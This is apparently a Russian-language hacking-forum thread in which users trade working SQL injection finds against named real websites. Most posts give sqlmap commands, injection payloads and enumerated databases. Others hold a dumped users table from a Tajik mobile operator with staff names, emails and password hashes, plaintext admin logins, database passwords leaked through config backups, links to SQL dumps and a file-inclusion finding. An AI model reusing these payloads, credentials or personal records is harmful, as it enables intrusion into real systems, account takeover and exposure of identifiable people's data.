Найденные интересеные SQL inj & XSS

[vally-hood]

GET /search/video/?s=%5c HTTP/1.1
Referer: https://www.zootubex.tv/
Cookie: ASPro_e6d47c9026=78f70446c1cf0c8919e06d90cfade07a; orientation=1
Host: www.zootubex.tv
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

видел нужно в теме threads/32841 решил поделиться

 

[AgatCyber]

А чего создателя темы в бан? За слишком удачную ветку?)

 

[Frame]

https://xss.pro/threads/26143/page-6#post-257953

 

[Robert_]

Оличная статья!

 

[vally-hood]

GET /category/live?tag=Libra HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.ccvalue.cn/
Cookie: PHPSESSID=3g7re6apuf232r45ejd6f46eue
Host: www.ccvalue.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*



Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tag=Libra' AND 2728=2728-- Krvv

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: tag=Libra' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(8951=8951,1))),0x7170627a71),8951)-- PaVD

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: tag=Libra' AND (SELECT 1201 FROM (SELECT(SLEEP(5)))JesI)-- cxXt
---
[01:37:03] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:37:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 7.1.33
back-end DBMS: MySQL >= 5.6

available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] tanlian_prod
[*] tanlian_test

 

[Eject]

А чего создателя темы в бан? За слишком удачную ветку?)

Слишком много хакал.

https://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/42009/

 

[vally-hood]

https://www.onesteptostart.com/admin
admin:gadmin2021
pass:admin

 

[Eject]

Не sqli но дамп:

https://www.euroved.ru/sql.sql

 

[vally-hood]

https://www.ktnnews.kr/admin login:admin pass:58221561 почти все сайты аналоги дырявые

 

[Duble]

sqlmap --url "https://smoservice.media/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1*&type=getHTML" --random-agent --threads=10 --batch --dbs

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 RLIKE (SELECT (CASE WHEN (4923=4923) THEN 1 ELSE 0x28 END))&type=getHTML

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 AND (SELECT 5531 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(5531=5531,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&type=getHTML

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: https://smoservice.media:443/bitrix/components/skyweb24/popup.pro/ajax.php?popupId=1 AND SLEEP(5)&type=getHTML
---
web application technology: PHP 7.2.31, Nginx 1.16.1
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] dbsmoservice
[*] information_schema

 

[Duble]

 --url "https://tiktopers.ru/go?id=*&type=tiktok"  --random-agent   --threads=10  --batch --dbs

Parameter: #1* (URI)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: https://tiktopers.ru:443/go?id=-2420 OR 1 GROUP BY CONCAT(0x716a7a7671,(SELECT (CASE WHEN (3787=3787) THEN 1 ELSE 0 END)),0x7176787071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&type=tiktok

Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: https://tiktopers.ru:443/go?id=-3492 UNION ALL SELECT 9179,9179,9179,CONCAT(0x716a7a7671,0x6e6a59557666644248574c75504772437576666e79776269766153586b5643796d636d68584f6e45,0x7176787071),9179,9179#&type=tiktok
---
[16:13:10] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[16:13:10] [INFO] fetching database names
[16:13:10] [INFO] used SQL query returns 2 entries
[16:13:10] [INFO] resumed: 'information_schema'
[16:13:10] [INFO] resumed: 'tiktoper_ru'

 

[Duble]

--url "https://www.starhit.ru/hudeem2013/index.php?r=site/index&user=blog_user*" --random-agent --threads=10 --batch --dbs

Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND 6874=6874 AND ('wwEa'='wwEa

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND (SELECT 9465 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9465=9465,1))),0x7162766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('AAuK'='AAuK

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user');SELECT SLEEP(5)#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') AND SLEEP(5) AND ('tWat'='tWat

Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: https://www.starhit.ru:443/hudeem2013/index.php?r=site/index&user=blog_user') UNION ALL SELECT CONCAT(0x7171787171,0x464a62516179506e6b4c69427847784a595845626165487270454e484d44766e42485a536c4d6b48,0x7162766b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BrdZ
---
web server operating system: Linux Ubuntu
web application technology: Nginx 1.10.3, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
available databases [3]:
[*] information_schema
[*] starhit_hudeem
[*] test

 

[vally-hood]

http://134.175.225.182:8089/smart_investment_cluster20181120.sql.zip sql китай что то с инвестициями

 

[Duble]

--url "https://5-apps.ru/engine/inc/extracloud/ajax/file.php*" --data="&action=check-yd-link&id=*" --random-agent --threads=10 --batch --dbs

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: &action=check-yd-link&id=' AND EXTRACTVALUE(5323,CONCAT(0x5c,0x7171717671,(SELECT (ELT(5323=5323,1))),0x7162717871))-- TCnn

available databases [2]:
[*] 5apps
[*] information_schema

 

[Duble]

Крупнейший оператор сотовой связи Таджикистана.
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: http://babilon-m.tj:80/tj/tarif.php?id=1' UNION ALL SELECT CONCAT(0x71706b7171,0x61646354444c4c6374504f6e475a6b436547546845527a70646a4b584d5152776674516a56524a51,0x716a7a7071),NULL-- SwnI
---
available databases [3]:
[*] bm
[*] information_schema
[*] test

Юзеры

Database: bm
Table: users
[54 entries]
+----+--------------------------------+----------------------------+---------+---------------------+---------------+------------------------------------------------------------------+----------------------+
| id | name                           | email                      | attempt | created             | username      | password                                                         | password_salt        |
+----+--------------------------------+----------------------------+---------+---------------------+---------------+------------------------------------------------------------------+----------------------+
| 1  | Абдурахим М.                   | abdurahim@babilon-m.tj     | <blank> | 2017-10-24 11:04:19 | admin         | 9bbeede777063fa45d97350f44defe694288ab5687e463f5ba1b4e525f4fb942 | i2oHpEtVsbiN8Qfeyjvd |
| 4  | vpetrov                        | petrov@babilon-m.tj        | 3       | 2017-10-24 20:16:07 | vpetrov       | 1afa56c5538282214b58a39c2316af5a470303e0c79ad708a5da2e81dab1b538 | EVXtlp4nZ6CUGDqC11o3 |
| 5  | Eraj                           | eraj@babilon-m.tj          | <blank> | 2017-10-24 20:56:05 | Eraj          | 9b67fce18d70cd8b9a8d47c575ed4e5e3af7fe13b8333b9091fc78fa7b03a836 | sPsoLxlhZJqSWLbEosBq |
| 6  | Zafar                          | kosimovz@babilon-m.tj      | <blank> | 2017-10-24 20:57:56 | Zafar         | 38c39e95210f96590b002559867fe880324a70062ccf435c4258eb293afd233e | G0si2NC1lmAVNA2aTNLa |
| 7  | Daler                          | dalers@babilon-m.tjs       | 1       | 2017-10-24 20:59:06 | Daler         | 0802cbb5470b5f3b222fed7ecb0dcb3fc2f1d3c02cb5339376ec82fd68ca79d9 | iLMi4zBsPlJB4nWl90a6 |
| 8  | Alisher                        | alisherk@babilon-m.tj      | <blank> | 2017-10-24 20:59:53 | Alisher       | e549c8f343feab945b553f10e880079cda00e7979fd4c611223309cd9e411be5 | 25M8u60bv7vANvIp44GU |
| 9  | Jamol                          | ccalievj@babilon-m.tj      | <blank> | 2017-10-24 21:00:36 | Jamol         | 80c576403656eaad0c430b6fa2f0139f25eddf96c78e70d909388a04661b5fce | ky6dun61AgbIRg68XUoa |
| 19 | CCMansurovS                    | ccmansurovs@babilon-m.tj   | <blank> | 2017-10-24 21:39:48 | CCMansurovS   | 13b2995c81aba3203df7d1f8751a4cad66731e8a411e55c70d632795632479ea | 8MDV8buuxVY99gig5Xsr |
| 11 | Abdulhamid                     | ccdavlatova@babilon-m.tj   | <blank> | 2017-10-24 21:18:51 | Abdulhamid    | 8efd2548c72b9c1436d760c9bb68838ff4d653846af599f6131bc3b9b2886783 | JBa30vgL7jiBWldglbix |
| 12 | Nodira                         | cczaidovan@babilon-m.tj    | <blank> | 2017-10-24 21:19:32 | Nodira        | 4994ed22e8b03daaa28593fa77f2a37488b3c5ed6d1e3d16af78ea5166a3e8fa | YVCBSEWrQgaqRllIQtkN |
| 13 | Robiya                         | sangovar@babilon-m.tj      | <blank> | 2017-10-24 21:20:11 | Robiya        | 11f9a882ec46bcb2e2d65f60f1333adcc249fbcbca55f875a35db8a090ddff18 | NnfzIsPPETesEQ5nmSQi |
| 14 | Elina                          | elina@babilon-m.tj         | 1       | 2017-10-24 21:20:49 | Elina         | e654b20e31348d3a6f34fcc96630d7f8ee13df2a3338f729d39c1472fe23bb19 | 80tQcOo2gJGW8WmGfbaU |
| 15 | Nekruz                         | ccnekruz@babilon-m.tj      | <blank> | 2017-10-24 21:22:04 | Nekruz        | 167625233c190f75cc26b2bd3ed65e9a95fc4ace0701a4fe92dabf108086c5ce | oy7sabaBwuaW6iobi5Pn |
| 16 | Gulbahor                       | gulbakhor@babilon-m.tj     | 2       | 2017-10-24 21:22:28 | Gulbahor      | 240a9d5fb185b40e209e03b8d85d0a14a0ca7cc676f58b92ee5105ef77273c45 | WBdrigPE1vH0auGyQ6rZ |
| 20 | Alidodov Umed                  | alidodov@babilon-m.tj      | <blank> | 2017-10-24 21:47:17 | Alidodov      | 4dcbcc4a09ea3edb6793e63fff499c485ec4c528b497362bd346b3ca79d4234d | augJWwRgo0Ib05csxJbH |
| 21 | Ikramoff                       | ikramoff@babilon-m.tj      | <blank> | 2017-10-25 17:04:29 | ikramoff      | 183d53c6e3c5346a83af6d97d04059dabcfd3cc0b0d43ab6c112cdeeb72b06c5 | vrxg6lbQfGl22NnIjnTd |
| 22 | ShoevK                         | ccshoevk@babilon-m.tj      | <blank> | 2017-11-15 17:30:16 | ShoevK        | 89afc970ff6934f7507bdd76eae8e9f4633c978eb11c0bf74a9fadb17d5d438c | HbTvLZbdnNesOY3L78av |
| 23 | Emomali                        | emom@khatlon.com           | <blank> | 2017-12-14 16:21:25 | Emomali       | ce752a6ae4a6a0595241571ce4158a8fd59eb9ec34f06a3f1232ee8259ab84ee | c09njK3HMxuGsGgzWjEf |
| 24 | BMKahramon                     | kahramon@khujandi.com      | <blank> | 2017-12-26 15:37:33 | BMKahramon    | 64bc003431a42336d832d63e5a315196ff56ef26350aabab6d8aac7d0abcf233 | 9YakWyGORbx6i714atS0 |
| 25 | BMSolieva                      | manzura@khujandi.com       | <blank> | 2017-12-26 15:43:35 | BMSolieva     | 069f7d83c35a613abc19fee6f097820bad18ecc7b25582200e39d07ef107f32a | PogJKXmv9lbvrlQSFgja |
| 26 | islom                          | islom@babilon-m.tj         | <blank> | 2018-02-09 14:11:44 | bmislom       | 6a4220e2fc1bf9973315eb38dbe3ee10478248f4f21367efc8265b520af4b270 | VKd0dZaNeGq0blsz2Xpe |
| 27 | CCMuminovS                     | ccmuminovs@babilon-m.tj    | <blank> | 2018-02-12 16:16:40 | CCMuminovS    | 271c8ad0991c214a12a0c6e31c1fe048465f2c7ae0dc1cc672d1e60788c14055 | fbwUsmjRsEm2pppy8gmE |
| 28 | CCSamandarM                    | samandarm@babilon-m.tj     | <blank> | 2018-02-12 16:20:35 | CCSamandarM   | 08b6d3d19c0ec7301a10f56361e990712f882abf748a51859794a789da6c04dd | YoU92s68GyiWBAGHW0p2 |
| 29 | CCDavronov                     | CCDavronovJ@babilon-m.tj   | <blank> | 2018-02-12 16:23:21 | CCDavronov    | 6cd99cccdb0093c3f28a47980611187ab0b8f193a1e70c62f7103636d5a86416 | 6KQcuRCn3aKRAfWKKYys |
| 30 | Firdavs Nazirov                | nfirdavs@babilon-m.tj      | <blank> | 2018-03-27 13:52:04 | Firdavs       | 81982f1ec21dc9a54bc59ffe86c256aeeaa72cbb64d7877ffb1d93c028935d5f | oD7mac1OzL3o6bZIl86v |
| 31 | CCBehruz                       | behruz@babilon-m.tj        | <blank> | 2018-04-04 10:29:26 | CCBehruz      | f569fc39cf1356fc95625130af7c8e14e004ee586b76f32ed49ad6fe2eec262c | Kes8XkXoOig6bKSH3zuz |
| 32 | CCMadeevF                      | madeevf@babilon-m.tj       | <blank> | 2018-04-04 10:32:32 | CCMadeevF     | 96485c8f7a104d9d18fb1bacbb46e7bc6762016b7f9a71a0c38a4792df0555b9 | bl7MbrQudFJXTbWHaJQu |
| 35 | BMYDilshod                     | dilshod80@babilon-m.tj     | <blank> | 2018-06-25 17:04:18 | BMYDilshod    | 445b0a86c1ae0b48ed13a20c52b1e825cd1fafce6c13f6c58ceb3c260e51006c | Llrw4PzlSRG3Ci6Rzmbe |
| 34 | Salohov Shahrom                | CCSalohovSh@babilon-m.tj   | <blank> | 2018-06-04 14:13:22 | shahrom       | d5c4c95a9f3e8d331fbb1e9124b124ee07b0ab1f1e9c2e187e84161034823af7 | Ogs9NubNVMOO3LgMJvSD |
| 39 | CCKhamidovF                    | cckhamidovf@babilon-m.tj   | <blank> | 2018-07-02 13:13:17 | CCKhamidovF   | cd923dcacc1e3e78b7b0cd1d88b53e5ef2de506d4b773012ba06822a19eca79c | k7JSnJMmnunIrMgTKFTk |
| 40 | Asomuddin Ikramoff             | _ikramoff@babilon-m.tj     | <blank> | 2018-07-17 10:20:49 | ikramof       | 183d53c6e3c5346a83af6d97d04059dabcfd3cc0b0d43ab6c112cdeeb72b06c5 | vrxg6lbQfGl22NnIjnTd |
| 44 | Yazdonkulov B.                 | YazdonkulovB@babilon-m.tj  | <blank> | 2019-02-25 13:59:24 | BMYazdonkulov | 7757fb89961aaec34b087798750320289d033a3ada959c51d94bbbee927a833b | 1Cndu1aIidGxlR2vecub |
| 45 | test                           | 123@123.com                | <blank> | 2019-05-11 13:52:07 | test          | b02f0d881122fb23fb8590ae16543d184cfae86893830a267c92607e28d9a802 | dMjsilbGoYU4hD6n5fyg |
| 46 | Шаимова Шахло                  | shahlo@khatlon.com         | <blank> | 2019-07-03 11:11:17 | BMShahlo      | 5bf7c93309364f90e5fd665d28a7c60d6ffbbf882f800230ecb9f89b4779c728 | jbWv6LHoKh6s0GH6NLsg |
| 47 | Мирзошарипов Сино              | sino@khatlon.com           | <blank> | 2019-07-03 11:11:43 | adminBMSino   | 8d6b666bb3fbf2a98826477436663fa2fa91978513a3defc08da9a13411ad2bf | G2UJsFDsLBsP4wqBeNpg |
| 48 | Мирзоев Хамза                  | hamza@khatlon.com          | <blank> | 2019-07-03 11:12:04 | BMHamza       | a820e99dba8253441dfbe6b7a81d72f0fb5f4ff57ab0e46b268fef8c46574f7b | yhpbbFoL2ufB7Tvs8lnC |
| 49 | Дустназаров Джамшед Дилмуродов | Jamshed@babilon-m.tj       | <blank> | 2019-10-01 10:59:39 | Jamshed       | d995a5c329855755a1fbc9a44f914ac9a6c40b41b05aae60b3af15cca8c9c6e3 | jyqd5opItriXSlnGK6O6 |
| 50 | Файзулло-зода Некруз Файзуллое | NekruzF@babilon-m.tj       | <blank> | 2019-10-01 11:01:05 | NekruzF       | 886740ecfab8593d05f66921c04354d7de4e2a2caef5e687edaf80e83e3d7458 | OnqS3SHauEshflpPsbn8 |
| 51 | Шербадалов Шароф               | Sharof@babilon-m.tj        | <blank> | 2019-10-01 11:02:20 | Sharof        | 227898c39d6de6938e5614f2de3ca86fa5ba0459d541a1eafd47967b96e09e8c | DpbBrSgsseuPjrxdaszF |
| 52 | Саидов Фирдавс                 | SaidovF@babilon-m.tj       | <blank> | 2019-10-01 11:02:56 | SaidovF       | 244a4b7c2b3b4733f2153e2f1a66969b29f4d0cc49f200a2d79c5a1e155ab96c | iXVdQLKe0NJKM3mLJefo |
| 53 | Хомидов Дилшод                 | homidovD@babilon-m.tj      | <blank> | 2019-10-01 11:03:37 | homidovD      | a088bd57b6f7764bd63b7113ff91dce39d39f08e0ded276346c147892c2b75be | sdAbUaIIIpS1IB1ju1kk |
| 54 | Сафаров Фаридун                | CCSafarovF@babilon-m.tj    | <blank> | 2019-10-01 11:04:25 | CCSafarovF    | db26da012d4b35b13e4e2417cc3ad2a2615d2137715789f6a5f42539c3a09e00 | 1ltahHObPSqWAfARgo40 |
| 55 | GafurovSh                      | CCGafurovSh@Babilon-m.tj   | <blank> | 2019-11-21 15:19:08 | CCGafurovSh   | 378a07acc3a46f445e023dce067becba83c1eb079b2af4c2e6195158d3be1321 | uEWgfdHmJDhMw8VcXyJv |
| 56 | Nazrishoeva                    | Nazrishoeva@babilon-m.tj   | <blank> | 2020-01-13 15:00:36 | Nazrishoeva   | 40c39250bfca7b50f7c60a810ce34cba6262b19c0d2f97ad6d2600d599be6ac4 | s7sV00mSHP3WY0uycYAg |
| 57 | Фарход Каримов                 | farhodm@babilon-m.com      | <blank> | 2020-06-05 14:04:54 | farhodm       | 082d12a9ca78a1ec085542c97431a1b1910621106c9e20bdb44f2fca98a84e00 | bSJogtbbnqsnODu704fn |
| 58 | Ганиев Ф.                      | ccganievf@babilon-m.com    | <blank> | 2020-06-25 09:52:40 | ccganievf     | d03870235dbe4bb1374e7950500b980b7b3c8afe2746f87c8d8326cf13918c84 | E1IOGzJC7bWlbbFCcQao |
| 59 | Тоджиев Ф.                     | tojievF@babilon-m.tj       | <blank> | 2020-06-25 09:53:53 | tojievF       | a06e9f9bb018e5563d2a85b42b15ac921251dd2d0fca06a576565c702fccd673 | Mi70iNTLVgbN5PCZ9gox |
| 60 | Шахром Ш.                      | ccshahromsh@babilon-m.com  | <blank> | 2020-06-25 09:55:27 | ccshahromsh   | 794e0988a8d9ff4f969f441509236fbbfa02bb7fb3e577a1e06fd017d53197cd | 0VboFVgddd5Zv2QNGzpr |
| 61 | Исматов А.                     | CCIsmatzodaA@babilon-m.com | <blank> | 2020-07-07 11:43:20 | CCIsmatzodaA  | bfe332337b32f33d3227e07897d85fc46fbc695c49306b3a87edf5e0e7b48a52 | bsXmuRLsXGTRCiOcGxlX |
| 62 | DalerS                         | DalerS@babilon-m.tj        | <blank> | 2020-08-07 14:34:24 | DalerS        | d5badba13e0aa7305ab708303dcbdb7efd5b5f04dedc6f122befb168f4deb862 | Nbsxwnj74Ohk5HdjAO2H |
| 63 | Хакимов Фируз                  | CCHakimovF@babilon-m.tj    | <blank> | 2020-09-28 15:15:01 | CCHakimovF    | c0a5088c578f635ae77ae6fa9accd0370a1e90ab616407e17d11cf0697584e5e | csOqPlL1S5vqyKgkp2Ag |
| 64 | CCZohidovB                     | CCZohidovB@babilon-m.com   | <blank> | 2020-10-12 16:06:14 | CCZohidovB    | 2ffbc07c5ab3542f309e996dc26bb9d487fa7c88c618505d527c1a536522b96d | pXK87noNAhfuQMHLggYG |
| 65 | Abdullo Yusupov                | u_abdullo@babilon-m.com    | <blank> | 2020-12-03 11:25:26 | uabdullo      | e32e2acd558919acf17486aa237435a4ce4a2a9ba3ae88a22e2e732b73ed9222 | bSij4POpsXiPntsADDjB |
| 66 | CCHotamovJ                     | CCHotamovJ@babilon-m.com   | <blank> | 2021-07-09 13:50:32 | CCHotamovJ    | 10f0f1bd51dd4d2486b6bcc9b9a3d2535311acad33623e597a5a9e045c9e2173 | xl8se3wanD0TVos3FRob |
+----+--------------------------------+----------------------------+---------+---------------------+---------------+------------------------------------------------------------------+----------------------+

 

[Eject]

http://pribory-spb.ru/backup.sql
http://pribory-spb.ru/pma4.0.4.1light222/

<?php
$conf[0] = $conf[1] =  array( "hostname"     => 'localhost',
                              "username"     => 'jail_priboryspb',
                              "password"     => 'vGzOnUo9sEnu',
                              "database"     => 'priborydb',
                              "tableprefix"  => 'pribory_',
                              "charset"      => 'cp1251',
                              "subfolder"    => '',
                              "debug"        => 0
                            );
$conf[1]['tableprefix'] = 'priborya_';

 

[boroda4]

Не sql, но тоже очень интересно.
Burp в прямые руки и все получится.

URL:http://nowa.cc/cometchat/cometchatcss.php
Parameter: cc_theme
Cookie input cc_theme was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Pattern found:Failed opening '/ssd/htdocs/cometchat/themes/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg/css/cometchat.css' for inclusion
GET /cometchat/cometchatcss.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Cookie: tplastvisit=1625409988;tplastactivity=0;top100_id=t1.1755606.1299008313.1625410009686;last_visit=1625405310160::1625416110160;ppWindowEnbl=1;vbulletin_collapse=forumbit_139%0Aforumbit_15%0Aforumbit_1%0Aforumbit_31%0Aforumbit_41%0Aforumbit_145%0Apostthanks2_5528736%0Apostthanks2_5542829%0Apostthanks2_5548575%0Apostthanks2_5548851%0Apostthanks2_5549126%0Apostthanks2_5550720%0Apostthanks2_5551268%0Apostthanks2_5566807%0Apostthanks2_5324502%0Apostthanks2_5346210%0Apostthanks2_5346837%0Apostthanks2_5346951%0Apostthanks2_5351866%0Apostthanks_5359870%0Apostthanks2_4515405%0Apostthanks2_4550873%0Apostthanks2_4618163%0Apostthanks2_4618191%0Apostthanks2_4653105%0Apostthanks2_4676336%0Apostthanks2_5029482%0Apostthanks2_5029857%0Apostthanks2_5036087%0Apostthanks2_5036895%0Apostthanks2_5037716%0Apostthanks2_100696%0Apostthanks2_3081198%0Apostthanks2_3105813%0Apostthanks2_3130840%0Apostthanks2_3149932%0Apostthanks2_3154934%0Apostthanks2_3155662;tplanguageid=72;tpforum_view=5a0b0dc75f693ba00a658098944721bd911facf5a-1-%7Bi-139_i-1625412074_%7D;tppda=1;cc_theme=http://some-inexistent-website.acu/...:1:{i:0;s:1:"1";};tpiskrsearchkeywordscount=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: nowa.cc
Connection: Keep-alive

 

[vally-hood]

Cryptominershub :: Crypto Wallets, Cryptocurrrencies trading, forex and Binary Options - Bitcoin, Ethereum, Litcoin

Cryptominershub, Invest, and Trade Crypto currencies - p2p digital currency, blockchain technology, crypto wallet, trade bitcoin, Cryptominershub, bitcoin, Cryptominershub,bitcoin price, Cryptominershub.

cryptominershub.com

Parameter: MULTIPART uname ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: -------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="login"


-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="uname"

1'"" AND (SELECT 8209 FROM(SELECT COUNT(*),CONCAT(0x716b6b6a71,(SELECT (ELT(8209=8209,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- KAGp
-------AcunetixBoundary_IEHOMMKPYJ--

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="login"


-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="password"

g00dPa$$w0rD
-------AcunetixBoundary_IEHOMMKPYJ
Content-Disposition: form-data; name="uname"

1'"" AND (SELECT 3125 FROM (SELECT(SLEEP(5)))jowA)-- WHYr
-------AcunetixBoundary_IEHOMMKPYJ--
---
[14:53:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:53:25] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:53:28] [INFO] fetching database names
[14:53:28] [INFO] starting 2 threads
[14:53:29] [INFO] retrieved: 'information_schema'
[14:53:29] [INFO] retrieved: 'u117317841_db'
available databases [2]:
[*] information_schema
[*] u117317841_db

 

[Duble]

https://tgrm.su:8888/phpmyadmin/

https://tgrm.su/blog/wp-content/wp-config.bak

/** Имя пользователя MySQL */
define('DB_USER', 'hg316668_db');

/** Пароль к базе данных MySQL */
define('DB_PASSWORD', 'Z6v5U5j6');

 

[boroda4]

https://shumoff.biz/depho/search?search_str=1%22%27

Ну вы поняли. Всё есть, главное - прямые руки.